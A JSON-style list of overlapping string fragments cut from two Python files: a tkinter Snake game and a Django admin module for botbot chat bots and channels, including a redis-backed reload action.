"and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) #",
"= True # Helper functions def create_block(): \"\"\" Creates an apple to be",
"\"\"\" Creates an apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE",
"process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2,",
"create_block(): \"\"\" Creates an apple to be eaten \"\"\" global BLOCK posx =",
"Snake class \"\"\" def __init__(self, segments): self.segments = segments # possible moves self.mapping",
"x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds",
"/ SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles",
"\"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2]",
"y2 > HEIGHT: IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK):",
"False root.after(100, main) # Not IN_GAME -> stop game and print message else:",
"head_coords # Check for collision with gamefield edges if x2 > WIDTH or",
"{\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} #",
"y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\"",
"s.change_direction) main() def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE),",
"False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating",
"root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set()",
"elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in",
"apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index",
"last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of",
"c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden')",
"if x2 > WIDTH or x1 < 0 or y1 < 0 or",
"segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\")",
"import Tk, Canvas import random # Globals WIDTH = 800 HEIGHT = 600",
"IN_GAME -> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class",
"SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\"",
"\"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class",
"== c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME -> stop game",
"in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake()",
"create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3,",
"# Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME =",
"= Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2,",
"= True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block()",
"(-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves",
"import random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20",
"x2 > WIDTH or x1 < 0 or y1 < 0 or y2",
"x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE)",
"c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the",
"from tkinter import Tk, Canvas import random # Globals WIDTH = 800 HEIGHT",
"create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME",
"c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s = create_snake() # Reaction",
"if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords #",
"y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 =",
"stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\"",
"create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments",
"= self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2)",
"c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text =",
"edges if x2 > WIDTH or x1 < 0 or y1 < 0",
"c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords",
"create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake():",
"Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2,",
"message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\"",
"if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME ->",
"global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE",
"c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text =",
"snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment",
"last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE",
"Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for",
"= c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\"",
"0 or y1 < 0 or y2 > HEIGHT: IN_GAME = False #",
"# Not IN_GAME -> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text,",
"Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text",
"> WIDTH or x1 < 0 or y1 < 0 or y2 >",
"Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\")",
"be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE)",
"\"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction",
"window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid()",
"collision with gamefield edges if x2 > WIDTH or x1 < 0 or",
"> HEIGHT: IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment()",
"def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden')",
"on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake segments",
"* random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE)",
"Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root,",
"# Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and",
"c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake",
"head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1):"
] |
[
"obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request,",
"model = models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class",
"doesn't call delete, so skips REFRESH actions = None def usage(self, obj): return",
"search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def",
"ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def get_extra(self, request, obj=None, **kwargs): return",
"to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot",
"django.conf import settings from django.contrib import admin from django.forms.models import BaseInlineFormSet from .",
"models.Channel.plugins.through formset = PluginFormset def get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin):",
"for the bot objects. \"\"\" import redis from django import forms from django.conf",
"0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable",
"REFRESH actions = None def usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() /",
"('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',) #",
"= ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter = ('status',",
"PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through",
"= ('is_active',) readonly_fields = ('server_identifier',) # Disable bulk delete, because it doesn't call",
"configuration for the bot objects. \"\"\" import redis from django import forms from",
"PluginFormset def get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection',",
"obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display = ('__unicode__',",
"qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy =",
"('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter = ('is_active',)",
"('server_identifier',) # Disable bulk delete, because it doesn't call delete, so skips REFRESH",
"self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name =",
"request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display =",
"delete, so skips REFRESH actions = None def usage(self, obj): return \"%d%%\" %",
"botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL)",
"return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage')",
"request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy",
"qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending Public",
"'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields =",
"'usage') list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',) # Disable bulk",
"= super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True",
"queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model =",
"# Disable bulk delete, because it doesn't call delete, so skips REFRESH actions",
"('is_active',) readonly_fields = ('server_identifier',) # Disable bulk delete, because it doesn't call delete,",
"form = ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter =",
"False def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel):",
"request): return False def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True)",
"( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon",
"= [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm",
"('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields",
"class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable =",
"from django import forms from django.conf import settings from django.contrib import admin from",
"__init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset =",
"has_add_permission(self, request): return False def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE,",
"readonly_fields = ('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions",
"super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name",
"configuration\" class ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude = [] def clean_private_slug(self):",
"} list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server')",
"class PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels,",
"proxy = True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels, PublicChannelApproval) admin.site.register(models.ChatBot, ChatBotAdmin) admin.site.register(models.Channel,",
"formset = PluginFormset def get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude",
"from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs)",
"= ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot')",
"= ('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions =",
"\"\"\" import redis from django import forms from django.conf import settings from django.contrib",
"('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request):",
"queryset): \"\"\" Ask daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH')",
"list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',) # Disable bulk delete,",
"ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug']",
"Ask daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description =",
"def has_add_permission(self, request): return False def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return",
"prepopulated_fields = { 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created',",
"None def usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100)",
"\"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm):",
"('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline]",
"'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields",
"return False def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class",
"[ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def get_queryset(self,",
"'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return",
"get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display",
"= models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin):",
"<filename>botbot/apps/bots/admin.py \"\"\"Django admin configuration for the bot objects. \"\"\" import redis from django",
"actions = None def usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels))",
"delete, because it doesn't call delete, so skips REFRESH actions = None def",
"def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class",
"import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline):",
"('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',) # Disable bulk delete, because it",
"bulk delete, because it doesn't call delete, so skips REFRESH actions = None",
"def usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def",
"/ float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to reload",
"import settings from django.contrib import admin from django.forms.models import BaseInlineFormSet from . import",
"None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured', 'created',",
"objects. \"\"\" import redis from django import forms from django.conf import settings from",
"(obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to",
"('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',) } list_editable = ('chatbot','status',)",
"'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',) }",
"'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields",
"class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model =",
"readonly_fields = ('server_identifier',) # Disable bulk delete, because it doesn't call delete, so",
"models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form",
"django.contrib import admin from django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet):",
"class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def get_extra(self, request, obj=None, **kwargs):",
"= True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels, PublicChannelApproval) admin.site.register(models.ChatBot, ChatBotAdmin) admin.site.register(models.Channel, ChannelAdmin)",
"def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display =",
"'is_active', 'usage') list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',) # Disable",
"= ('server_identifier',) # Disable bulk delete, because it doesn't call delete, so skips",
"\"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude = []",
"from django.contrib import admin from django.forms.models import BaseInlineFormSet from . import models class",
"botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude",
"self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name', 'chatbot', 'status',",
"model = models.Channel.plugins.through formset = PluginFormset def get_extra(self, request, obj=None, **kwargs): return 0",
"settings from django.contrib import admin from django.forms.models import BaseInlineFormSet from . import models",
"list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured', 'is_public',",
"bot objects. \"\"\" import redis from django import forms from django.conf import settings",
"**kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def",
"[] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display",
"exclude = ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter",
"request, queryset): \"\"\" Ask daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot',",
"= ('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',) # Disable bulk delete, because",
"return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name', 'chatbot',",
"= \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude =",
"= models.Channel.plugins.through formset = PluginFormset def get_extra(self, request, obj=None, **kwargs): return 0 class",
"= ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',) } list_editable =",
"= ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server') inlines =",
"import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset,",
"list_filter = ('is_active',) readonly_fields = ('server_identifier',) # Disable bulk delete, because it doesn't",
"or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured',",
"float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to reload configuration",
"'created', 'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',)",
"it doesn't call delete, so skips REFRESH actions = None def usage(self, obj):",
"'chatbot') prepopulated_fields = { 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint',",
"= PluginFormset def get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude =",
"('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh]",
"BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args,",
"admin configuration for the bot objects. \"\"\" import redis from django import forms",
"% ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask",
"redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model",
"ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter",
"class Meta: model = models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or",
"True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels, PublicChannelApproval) admin.site.register(models.ChatBot, ChatBotAdmin) admin.site.register(models.Channel, ChannelAdmin) admin.site.register(models.UserCount)",
"class Meta: proxy = True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels, PublicChannelApproval) admin.site.register(models.ChatBot,",
"'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model = models.Channel",
"('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields = ('name',",
"**kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active',",
"100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to reload configuration \"\"\" queue",
"inlines = [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False",
"ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',)",
"skips REFRESH actions = None def usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count()",
"list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields =",
"**kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def get_extra(self, request, obj=None,",
"import redis from django import forms from django.conf import settings from django.contrib import",
"*args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset",
"\"\"\" Ask daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description",
"'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin):",
"[botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def get_queryset(self, request): qs =",
"botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude = [] def",
". import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class",
"def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to reload configuration \"\"\" queue =",
"class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated')",
"'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields =",
"PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request)",
"self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def get_extra(self, request,",
"import forms from django.conf import settings from django.contrib import admin from django.forms.models import",
"PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels, PublicChannelApproval)",
"configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class",
"forms from django.conf import settings from django.contrib import admin from django.forms.models import BaseInlineFormSet",
"'status', 'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = {",
"list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields = ('name', 'chatbot__server') inlines",
"class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def get_queryset(self, request): qs = super(PublicChannelApproval,",
"the bot objects. \"\"\" import redis from django import forms from django.conf import",
"Meta: proxy = True verbose_name = \"Pending Public Channel\" admin.site.register(PublicChannels, PublicChannelApproval) admin.site.register(models.ChatBot, ChatBotAdmin)",
"{ 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated') search_fields",
"= None def usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) *",
"because it doesn't call delete, so skips REFRESH actions = None def usage(self,",
"get_queryset(self, request): qs = super(PublicChannelApproval, self).get_queryset(request) return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta:",
"admin from django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self,",
"list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug': ('name',) } list_editable",
"exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form =",
